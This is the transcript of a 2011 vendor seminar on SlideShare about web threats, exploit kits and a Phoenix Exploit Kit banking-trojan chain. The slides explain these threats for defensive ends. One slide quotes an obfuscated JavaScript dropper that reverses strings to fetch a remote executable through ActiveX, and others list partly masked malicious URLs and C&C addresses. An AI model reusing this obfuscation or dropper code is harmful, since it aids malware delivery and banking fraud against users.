Protect critical infrastructure by Patrick de Jong
Upcoming SlideShare
Loading in...5
×
 

Protect critical infrastructure by Patrick de Jong

on

  • 970 views

Seminar by Patrick de Jong during Infosecurity.be 2011

Seminar by Patrick de Jong during Infosecurity.be 2011

Statistics

Views

Total Views
970
Views on SlideShare
936
Embed Views
34

Actions

Likes
0
Downloads
28
Comments
0

1 Embed 34

http://www.infosecurity.be 34

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Protect critical infrastructure by Patrick de Jong Protect critical infrastructure by Patrick de Jong Presentation Transcript

  • Protecting your critical infrastructureagainst web threatsPatrick de JongSales Engineer, Northern Europe
  • Agenda:• Critical infrastructure / web threats relation• What are we facing (some statistics) and why• Spreading the malware• How do ‘they’ stay undetected?• What harm can ‘they’ do?• An example (Phoenix + Banker trojan)• The message of the photo (opening slide)
  • Crititcal infrastructure Web threats?‘Everything’ got connected. Digitized control (remote) based on standard OS like Windows or Linux and using standard Ethernet , TCP/IP Proprietary boxes with push buttons and switches. without any networking/connectivity (later with proprietary OS and networks). View slide
  • Crititcal infrastructure – Web threats View slide
  • Some statistics (what are we facing) Web-based Threats Of new threats come 92% from the Web Increase in Web 671% Malware* over 2008 Web malware from legitimate 79,9% sites*** AV-test currently (01-2011) counted 50 million samples** Source: Websense
  • Some statistics(what are we facing) Web 2.0 Landscape Current AV catch Collaboration Under 40% rates* Tools Social Enterprise Networking SaaS Malware dead within Social Media WEB 2.0 Media Sharing 52% 24 hours** Interactive Client Sharing Applications Mass World-wide blended Comms 10 billion threat emails per day* Source: M86 SecurityLabs**Source: Panda Labs
  • Why? Driven by money.Just as Professional as Commercial Software 7
  • Why? Driven by money.Joint venture toolkits
  • Why? Driven by money.Data selling
  • Why? Mostly driven by money.Buying & Selling ‘victims’
  • Spreading the malwareemail spam and malicous websites
  • Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)
  • Spreading the malwaremalware distribution via legitimate websites (stolen ftp or hack)• Attacker benefits from someone else’s traffic and reputation• Designed to defeat URL filtering & reputation software• Most malware is now spread via compromised legitimate sites
  • How ‘they’ stay undetected
  • How they stay undetectedEvasive techniques
  • How they stay undetectedEvasive techniques behind the scenes
  • How they stay undetectedCode obfuscation var fname = "C:mssync20.exe"; var url = RV("1=edom?php.ssr/2ssr/moc.enilnolanosrep-vt.www//:ptth"); RE(""); var _r = RE(";)tcejbo(tnemelEetaerc.tnemucod"); RE(";)r_,di(etubirttAtes.r_"); RE(";)63E92CF40C00-A389-0D11-3A56-655C69DB:dislc,dissalc(etubirttAtes.r_"); var is_ok= 0; try { var _s = RE(";),maerts.bdoda(tcejbOetaerC.r_"); is_ok= 1; } catch(e){} function RE(s) { return eval(RV(s)); } if (is_ok!= 1) { function RV(s) try { { var rev = ""; var _s = RE(";)maerts.bdoda(tcejbOXevitcA wen"); is_ok= 1; (i = 0; i < s.length; i++) for } { catch(e){} rev = s.charAt(i) + rev; } } return rev; }
  • How they stay undetectedCode obfuscation Reverse malicious code – undetected !! ‘Actual’ Malicious code – detected (7 out of 31)
  • How they stay undetectedDynamic code obfuscation
  • How they stay undetectedDynamic code obfuscation
  • How they stay undetectedPrivate exploit encryption NeoSploit Infection process … <malicious IFRAME>… Generating obfuscated JS Generating key and sending it to the server Using the key to generate an encrypted script that is sent back to the client The browser opens the encrypted script with key and executes the JS code
  • Toolkits/Trojans/C&CWhat can they do with it
  • Toolkits/Trojans/C&CWhat can they do with it
  • Example: banking trojanMoney mules
  • Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv ….Using stolen FTP accounts, the cyber gang managed to inject an Iframethat leads to the Phoenix Exploit Kit on thousands of legitimatewebsites
  • Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv …. The website content contains The user accesses to a compromised website redirection to the Phoenix Exploit KitThe user is redirected to the Phoenix Exploit Kit 2.3http://fan******.net/.ph/5 the payload was downloaded successfully The user’s PC exploited,
  • Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv ….This specific configuration file contains injection ordersthat will be used when the user accesses to the bank Compromised website The malware downloads a configuration file from: hxxp://uste*****.com.tr/Scripts/rd.bin
  • Example: banking trojan Legitimate Websites: The gang doesn’t want to uncover the video2mp3.net msgdiscovery.com main C&C to the world and uses the everythingon.tv Exploit Kit server as a proxy to the main …. C&C server After successful connection test, the bot reports Compromised Google the C&C server about new installation to: website hxxp://195.***.**.147:3128/data/set.php Before the Trojan accesses to the Command & Control server it verifies the user’s PC is connected to the internet. http://google.com/webhp
  • Example: banking trojan Legitimate Websites: video2mp3.net msgdiscovery.com everythingon.tv …. Compromised Google website Besides the Trojan banker, the server sends the user another The gang operates in multiple vectors, using social malware – Fake AV engineering it tries to convince the user to buy fake AV
  • Example: banking trojan The Trojan adds a script (on the client site) to every page in the website. Of course the script is not located on the server, Financial and the user is redirected to the C&C to download it: institution The Trojan holds until the user accesses the bank hxxp://cheap********card.info/brap/bscript.js
  • Example: banking trojan From that point the Trojan supervises all user activity with the bank. The moment at which the user tries to commit a transaction, the bot communicates with the C&C and receives full information about the new transaction that the bot is intending to commit. Financial The bot replaces the details in the ‘transaction institution submit form’ and sends it to the server
  • Example: banking trojan Financial An example of a successful transaction generated by institution the Trojan to the money mule account
  • The photo
  • Patrick de JongSales Engineer Northern EuropePhone: +31 33 454 3533Mobile: +31 6 1373 2964Email: patrick.dejong@m86security.com